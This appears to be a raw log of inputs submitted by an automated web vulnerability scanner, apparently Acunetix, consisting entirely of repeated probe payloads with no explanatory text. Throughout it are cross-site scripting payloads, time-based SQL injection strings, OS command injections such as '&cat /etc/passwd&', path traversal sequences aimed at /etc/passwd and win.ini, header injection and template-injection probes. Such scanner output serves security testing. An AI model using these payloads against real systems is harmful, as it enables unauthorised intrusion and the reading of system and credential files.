1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901432)"></g></svg>

1

"+response.write(9720025*9664803)+"

&cat /etc/passwd&

1

WEB-INF/web.xml

1<div style=width:expression(prompt(928937))>

1

WEB-INF\web.xml

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(931721)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942732)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

`cat /etc/passwd`

1

${100056+99888}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(979545)>

1

1

1

|cat /etc/passwd#

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n932208=v940833

1

1<img/src=">" onerror=alert(914578)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

iWnucqSA'

1

1<ScRiPt%20>prompt(939454)</sCripT>

"|"ld

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1&lt

'"()

yhHEk3KJ')

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

\xf6<img acu onmouseover=prompt(936986) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'

LjnNWdYO'))

1

1

1

1<input autofocus onfocus=prompt(926433)>

1

/etc/passwd

1

-1

1

1

"

"

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hit3aP3uTA9aR.bxss.me/

1

-1)

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_ERZ59 <ScRiPt >prompt(995747)</ScRiPt>

comments

-1))

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1

1

RHXKhIrh'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

1

1

http://www.acunetix.tst

1

1

comments/.

fMWvDS6E')

1'"()&%<ScRiPt >prompt(990185)</ScRiPt>

"&dir&"

'"

1

1

1

file:///etc/passwd

1

|dir

<!--

'"()&%<ScRiPt >prompt(933444)</ScRiPt>

Af19FuIL'))

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_919642

1

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

WEB-INF\web.xml

1

acu2469\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2469

1

1

1

1

acux9808\xc0\xbez1\xc0\xbcz2a\x90bcxuca9808

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(919670)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(972321)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(960792)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928730></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(975340)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(901949)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929790)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9742635*9781062)

1

1<div style=width:expression(prompt(995375))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

'+response.write(9742635*9781062)+'

1

1

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

"+response.write(9742635*9781062)+"

1

1

1

1<body onload=prompt(950568)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996996)>

1

cat /etc/passwd

1

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(993416)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

${99434+99237}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(945255)>

|cat /etc/passwd#

1

1&n947198=v919863

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<ScRiPt%20>prompt(958461)</sCripT>

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

"|"ld

!(()&&!|*|*|

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(999073) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

testasp.vulnweb.com

1

s85Dq5dW'

'

1

1

"

1<input autofocus onfocus=prompt(942479)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1

T5bUxCv2')

1

http://hitKq8Brd6IUo.bxss.me/

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

1

dOXciRe1'))

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

&dir

comments

1

1

1_EfcSo <ScRiPt >prompt(984987)</ScRiPt>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

1

1

comments

http://www.acunetix.tst

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

"&dir&"

-1))

1'"()&%<ScRiPt >prompt(910359)</ScRiPt>

1

1

comments/.

1

1

'"()&%<ScRiPt >prompt(941202)</ScRiPt>

115bnGCs'

|dir

<!--

1

file:///etc/passwd

1

1

1

1_962459

1

'|dir

uF8nkh9O')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

WEB-INF/web.xml

acu3775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3775

1

Bp1b9En0'))

1

1

1

WEB-INF\web.xml

1

acux7606\xc0\xbez1\xc0\xbcz2a\x90bcxuca7606

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt >prompt(946236)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<script>prompt(911710)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(903224)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?907704></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(985513)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(974940)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987423)"></g></svg>

response.write(9679969*9894730)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

'+response.write(9679969*9894730)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(951104))>

1

1

1

"+response.write(9679969*9894730)+"

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1

1<body onload=prompt(902839)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916510)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(978596)>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1<img/src=">" onerror=alert(918410)>

1

-1

${100280+100105}

1

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(936634)</sCripT>

1

1

1

-1)

1

'|'ld

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

"|"ld

-1))

1&n918885=v916741

)

\xf6<img acu onmouseover=prompt(940789) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

coZ5YCun'

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(957760)>

1

TIuZne51')

1

/etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

60JBSOYh'))

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

testasp.vulnweb.com

[url=http://www.acunetix.com]website security[/url]

-1

"

1

1

1

"

1_8Qotg <ScRiPt >prompt(984435)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1

http://hitUkwK4zQQTY.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1))

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1

wAJQ70GT'

1

comments

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

aYS0qV47')

file:///etc/passwd

1

1

'"

1

http://www.acunetix.tst

comments

1

"&dir&"

1'"()&%<ScRiPt >prompt(953386)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

sl2qrIDY'))

<!--

|dir

comments/.

1

1

'"()&%<ScRiPt >prompt(987226)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

1_999775

1

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

acu2645\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2645

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acux2147\xc0\xbez1\xc0\xbcz2a\x90bcxuca2147

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(971183)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(997057)</script>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(982179)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998503></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(922996)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(983615)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929409)"></g></svg>

1

1

response.write(9570644*9588279)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(925534))>

1

1

'+response.write(9570644*9588279)+'

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9570644*9588279)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<body onload=prompt(906090)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981695)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(999158)>

cat /etc/passwd

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

1<img/src=">" onerror=alert(975879)>

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(953660)</sCripT>

1

${100207+100457}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n918149=v935212

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

)

"|"ld

\xf6<img acu onmouseover=prompt(913603) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

QRhIzF6p'

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(923043)>

ef2BIibD')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

'"()

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

^(#$!@#$)(()))******

1

/etc/passwd

"

1

obxCybDI'))

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_GVcQ5 <ScRiPt >prompt(964217)</ScRiPt>

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

http://hitDP15nIlyHy.bxss.me/

1

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

'&dir&'

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

NImbORta'

comments

1

"&dir&"

1

http://www.acunetix.tst

1

1

file:///etc/passwd

1

comments

4gIGmsMH')

1

|dir

'"

1

1'"()&%<ScRiPt >prompt(937636)</ScRiPt>

0RluEo4E'))

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

1

'"()&%<ScRiPt >prompt(927821)</ScRiPt>

'|dir

<!--

1

1

1

WEB-INF/web.xml

1

"|dir

1

1_983103

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

acu5033\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5033

1

1

1

1

../../../../../../../../../../boot.ini

1

acux10340\xc0\xbez1\xc0\xbcz2a\x90bcxuca10340

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(906436)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(968202)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(947397)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915729></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(940656)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(988106)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9605432*9158452)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998272)"></g></svg>

1

1

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9605432*9158452)+'

1<div style=width:expression(prompt(944679))>

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

"+response.write(9605432*9158452)+"

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(984739)>

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977853)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

-1

|cat /etc/passwd#

${99319+99826}

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(911959)>

'|'ld

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img/src=">" onerror=alert(922154)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

"|"ld

-1))

1<ScRiPt%20>prompt(958058)</sCripT>

1&n955117=v949340

1some_inexistent_file_with_long_name%00.jpg

1

)

1

0s1aDxzD'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1

DSmqai0l')

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(905831) //\xf6>

'

1

'"()

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

qwpIXOli'))

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1<input autofocus onfocus=prompt(942644)>

1

/etc/passwd

1

-1

'

1

1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

http://hit6qbCvHd3UG.bxss.me/

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

&dir

${@print(md5(acunetix_wvs_security_test))}

1

1_lbgz3 <ScRiPt >prompt(958820)</ScRiPt>

1

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

QgMDffnk'

comments

"&dir&"

1

1

1

1

comments/.

k9POv217')

1

1

1

1

1

|dir

file:///etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(974906)</ScRiPt>

1

Qb9B0XRc'))

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

1

'"()&%<ScRiPt >prompt(912607)</ScRiPt>

1

WEB-INF/web.xml

1

"|dir

1

1

1

1_917099

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

acu2182\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2182

1

1

1

../../../../../../../../../../boot.ini

1

1

acux7465\xc0\xbez1\xc0\xbcz2a\x90bcxuca7465

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931846)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(947888)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(971217)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964993></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(901682)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(980686)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9767443*9300345)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(956988)"></g></svg>

1

'+response.write(9767443*9300345)+'

&cat /etc/passwd&

1<div style=width:expression(prompt(976690))>

1

1

1

"+response.write(9767443*9300345)+"

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<body onload=prompt(989646)>

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(956911)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(950233)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99007+100455}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1<img/src=">" onerror=alert(966075)>

1

1&n980948=v903762

-1))

1

1<ScRiPt%20>prompt(998160)</sCripT>

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1nrlXbdF'

1

1

1

)

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

sDP2yqg3')

1

\xf6<img acu onmouseover=prompt(965083) //\xf6>

!(()&&!|*|*|

testasp.vulnweb.com

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

6o2EnzDD'))

1

1<input autofocus onfocus=prompt(968098)>

'

"

1

^(#$!@#$)(()))******

'"()

/etc/passwd

1

1

"

-1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

&dir

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1_sCT3O <ScRiPt >prompt(941510)</ScRiPt>

'&dir&'

http://hits55u6DgULI.bxss.me/

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

acunetix_wvs_invalid_filename

"&dir&"

1

3SK3YcQa'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

|dir

'"

1

1

1

U8bpVCcf')

'|dir

1

file:///etc/passwd

1

comments

<!--

VFB0WPGR'))

1

1

1

"|dir

1

comments/.

1'"()&%<ScRiPt >prompt(956077)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(946895)</ScRiPt>

1

1

1

1

1

1_984580

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu5773\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5773

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux4650\xc0\xbez1\xc0\xbcz2a\x90bcxuca4650

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(949909)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(902134)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(936311)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
